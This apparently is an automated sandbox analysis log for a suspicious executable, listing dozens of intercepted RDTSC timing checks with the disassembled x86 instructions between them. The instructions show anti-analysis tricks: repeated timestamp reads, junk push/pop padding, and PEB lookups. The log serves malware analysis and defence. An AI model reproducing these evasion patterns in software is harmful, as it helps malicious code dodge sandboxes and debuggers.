Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 17A2C52 second address: 17A2C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6000A second address: 6E60010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60010 second address: 6E60014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60014 second address: 6E60025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60025 second address: 6E6005B instructions: 0x00000000 rdtsc 0x00000002 mov di, 994Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F9D01181AB2h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9D01181AB7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6005B second address: 6E60061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60061 second address: 6E600B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F9D01181AB7h 0x0000000f mov eax, dword ptr fs:[00000030h] 0x00000015 jmp 00007F9D01181AB6h 0x0000001a sub esp, 18h 0x0000001d pushad 0x0000001e mov ecx, 183FB4EDh 0x00000023 mov bl, al 0x00000025 popad 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov esi, edx 0x0000002c mov ebx, 6D387C1Eh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E600B6 second address: 6E600D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f movzx esi, dx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E600D7 second address: 6E60109 instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cx, di 0x0000000a popad 0x0000000b mov ebx, dword ptr [eax+10h] 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 mov edx, 51AD6B5Ch 0x00000017 popad 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9D01181AB7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60109 second address: 6E60158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9D00F1DB5Ch 0x00000013 sbb si, 1608h 0x00000018 jmp 00007F9D00F1DB5Bh 0x0000001d popfd 0x0000001e mov ch, 74h 0x00000020 popad 0x00000021 mov esi, dword ptr [74E806ECh] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov ax, D549h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60158 second address: 6E60174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test esi, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9D01181AB1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60174 second address: 6E601AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov edx, 6F23FBAEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007F9D00F1E9C3h 0x00000013 jmp 00007F9D00F1DB65h 0x00000018 xchg eax, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9D00F1DB5Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E601AC second address: 6E601B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E601B2 second address: 6E601B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E601B6 second address: 6E601BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E601BA second address: 6E60205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9D00F1DB64h 0x00000010 adc eax, 5ED0BF88h 0x00000016 jmp 00007F9D00F1DB5Bh 0x0000001b popfd 0x0000001c mov esi, 7475BBFFh 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9D00F1DB61h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60205 second address: 6E6022F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [74E50B60h] 0x0000000f mov eax, 750BE5E0h 0x00000014 ret 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9D01181AADh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6022F second address: 6E602A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b pushad 0x0000000c pushad 0x0000000d mov dx, cx 0x00000010 mov edi, ecx 0x00000012 popad 0x00000013 pushad 0x00000014 movzx ecx, bx 0x00000017 pushfd 0x00000018 jmp 00007F9D00F1DB5Dh 0x0000001d add cx, 6016h 0x00000022 jmp 00007F9D00F1DB61h 0x00000027 popfd 0x00000028 popad 0x00000029 popad 0x0000002a pop edi 0x0000002b jmp 00007F9D00F1DB5Eh 0x00000030 xchg eax, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F9D00F1DB67h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E602A2 second address: 6E602F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9D01181AB1h 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov cl, B7h 0x00000013 movsx edi, cx 0x00000016 popad 0x00000017 push dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9D01181AB7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E602F4 second address: 6E6034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 76h 0x00000005 pushfd 0x00000006 jmp 00007F9D00F1DB60h 0x0000000b and si, 2DB8h 0x00000010 jmp 00007F9D00F1DB5Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f pushad 0x00000020 push esi 0x00000021 jmp 00007F9D00F1DB5Bh 0x00000026 pop eax 0x00000027 mov cx, bx 0x0000002a popad 0x0000002b push dword ptr [eax+18h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F9D00F1DB5Dh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6034A second address: 6E60350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60350 second address: 6E60367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E603C0 second address: 6E603C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E603C6 second address: 6E60403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 3Ch 0x00000005 pushfd 0x00000006 jmp 00007F9D00F1DB65h 0x0000000b or ecx, 33BDE886h 0x00000011 jmp 00007F9D00F1DB61h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60403 second address: 6E6040C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 5F3Ch 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6040C second address: 6E60421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60526 second address: 6E605A5 instructions: 0x00000000 rdtsc 0x00000002 mov dx, F386h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dx, C212h 0x0000000c popad 0x0000000d mov dword ptr [esi+10h], eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov edx, 4B98EEF8h 0x00000017 call 00007F9D01181AB1h 0x0000001c pop ecx 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007F9D01181AB1h 0x00000024 or cl, FFFFFF96h 0x00000027 jmp 00007F9D01181AB1h 0x0000002c popfd 0x0000002d popad 0x0000002e mov eax, dword ptr [ebx+50h] 0x00000031 jmp 00007F9D01181AAEh 0x00000036 mov dword ptr [esi+14h], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F9D01181AB7h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E605A5 second address: 6E6060A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007F9D00F1DB5Eh 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 pushad 0x00000015 movzx esi, bx 0x00000018 mov ebx, 34C4FF8Eh 0x0000001d popad 0x0000001e mov eax, dword ptr [ebx+58h] 0x00000021 jmp 00007F9D00F1DB65h 0x00000026 mov dword ptr [esi+1Ch], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F9D00F1DB5Dh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6060A second address: 6E6062C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, si 0x00000012 mov bx, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6062C second address: 6E6063C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6063C second address: 6E60683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+20h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9D01181AB4h 0x00000015 sub al, FFFFFFF8h 0x00000018 jmp 00007F9D01181AABh 0x0000001d popfd 0x0000001e mov si, EB2Fh 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+60h] 0x00000026 pushad 0x00000027 mov ebx, eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60683 second address: 6E60714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F9D00F1DB68h 0x00000009 pop esi 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esi+24h], eax 0x0000000f jmp 00007F9D00F1DB61h 0x00000014 mov eax, dword ptr [ebx+64h] 0x00000017 pushad 0x00000018 movzx eax, dx 0x0000001b mov dx, EDFCh 0x0000001f popad 0x00000020 mov dword ptr [esi+28h], eax 0x00000023 pushad 0x00000024 mov cl, dh 0x00000026 mov si, 5A39h 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+68h] 0x0000002e jmp 00007F9D00F1DB64h 0x00000033 mov dword ptr [esi+2Ch], eax 0x00000036 jmp 00007F9D00F1DB60h 0x0000003b mov ax, word ptr [ebx+6Ch] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F9D00F1DB67h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60714 second address: 6E60798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007F9D01181AAEh 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 jmp 00007F9D01181AB0h 0x0000001e mov word ptr [esi+32h], ax 0x00000022 jmp 00007F9D01181AB0h 0x00000027 mov eax, dword ptr [ebx+0000008Ch] 0x0000002d jmp 00007F9D01181AB0h 0x00000032 mov dword ptr [esi+34h], eax 0x00000035 pushad 0x00000036 mov dh, al 0x00000038 mov dx, C35Eh 0x0000003c popad 0x0000003d mov eax, dword ptr [ebx+18h] 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60798 second address: 6E6079C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6079C second address: 6E607A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E607A0 second address: 6E607A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E607A6 second address: 6E607F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007F9D01181AAEh 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9D01181AB7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E607F0 second address: 6E60818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, dx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60818 second address: 6E6081D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E6081D second address: 6E60832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D00F1DB61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60832 second address: 6E608D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b pushad 0x0000000c mov ch, bl 0x0000000e pushfd 0x0000000f jmp 00007F9D01181AB4h 0x00000014 sbb ecx, 41CEB8D8h 0x0000001a jmp 00007F9D01181AABh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esi+40h], eax 0x00000024 pushad 0x00000025 pushad 0x00000026 mov si, 0BA1h 0x0000002a pushfd 0x0000002b jmp 00007F9D01181AAEh 0x00000030 sub cl, 00000038h 0x00000033 jmp 00007F9D01181AABh 0x00000038 popfd 0x00000039 popad 0x0000003a push eax 0x0000003b pushfd 0x0000003c jmp 00007F9D01181AAFh 0x00000041 sub al, FFFFFFFEh 0x00000044 jmp 00007F9D01181AB9h 0x00000049 popfd 0x0000004a pop esi 0x0000004b popad 0x0000004c lea eax, dword ptr [ebx+00000080h] 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F9D01181AAAh 0x00000059 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E608D2 second address: 6E608FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c mov dh, ch 0x0000000e mov dh, 65h 0x00000010 popad 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9D00F1DB5Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E608FB second address: 6E609B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, dx 0x0000000e pushfd 0x0000000f jmp 00007F9D01181AB3h 0x00000014 adc ch, 0000007Eh 0x00000017 jmp 00007F9D01181AB9h 0x0000001c popfd 0x0000001d popad 0x0000001e nop 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F9D01181AACh 0x00000026 sbb cl, 00000078h 0x00000029 jmp 00007F9D01181AABh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F9D01181AB8h 0x00000035 sub cx, 4BD8h 0x0000003a jmp 00007F9D01181AABh 0x0000003f popfd 0x00000040 popad 0x00000041 lea eax, dword ptr [ebp-10h] 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F9D01181AB5h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E609B2 second address: 6E609D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D00F1DB5Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E609D7 second address: 6E609DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A2B second address: 6E60A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A2F second address: 6E60A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A4C second address: 6E60A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A52 second address: 6E60A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c call 00007F9D01181AB7h 0x00000011 pop eax 0x00000012 pop edx 0x00000013 popad 0x00000014 js 00007F9D6F1206F1h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A84 second address: 6E60A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A88 second address: 6E60A99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60A99 second address: 6E60ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 2342143Eh 0x00000014 mov ecx, ebx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60ABC second address: 6E60AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9D01181AAAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AE1 second address: 6E60AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AE5 second address: 6E60AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AEB second address: 6E60AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AF1 second address: 6E60AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AF5 second address: 6E60AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60AF9 second address: 6E60B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+78h] 0x0000000b pushad 0x0000000c mov bh, cl 0x0000000e pushfd 0x0000000f jmp 00007F9D01181AB7h 0x00000014 and eax, 301953AEh 0x0000001a jmp 00007F9D01181AB9h 0x0000001f popfd 0x00000020 popad 0x00000021 push 00000001h 0x00000023 jmp 00007F9D01181AAEh 0x00000028 nop 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60BC7 second address: 6E60BD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60BD6 second address: 6E60C3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007F9D01181AAEh 0x00000010 test edi, edi 0x00000012 jmp 00007F9D01181AB0h 0x00000017 js 00007F9D6F12054Ah 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007F9D01181AACh 0x00000026 adc si, A368h 0x0000002b jmp 00007F9D01181AABh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60C3C second address: 6E60CBB instructions: 0x00000000 rdtsc 0x00000002 call 00007F9D00F1DB68h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F9D00F1DB5Bh 0x00000010 add esi, 7C6D6F5Eh 0x00000016 jmp 00007F9D00F1DB69h 0x0000001b popfd 0x0000001c popad 0x0000001d mov eax, dword ptr [ebp-04h] 0x00000020 jmp 00007F9D00F1DB5Eh 0x00000025 mov dword ptr [esi+08h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007F9D00F1DB5Dh 0x00000030 jmp 00007F9D00F1DB60h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60CBB second address: 6E60CD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, F1h 0x00000011 mov dx, si 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60CD6 second address: 6E60CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E60CDD second address: 6E60D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000001h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9D01181AB9h 0x00000012 rdtsc
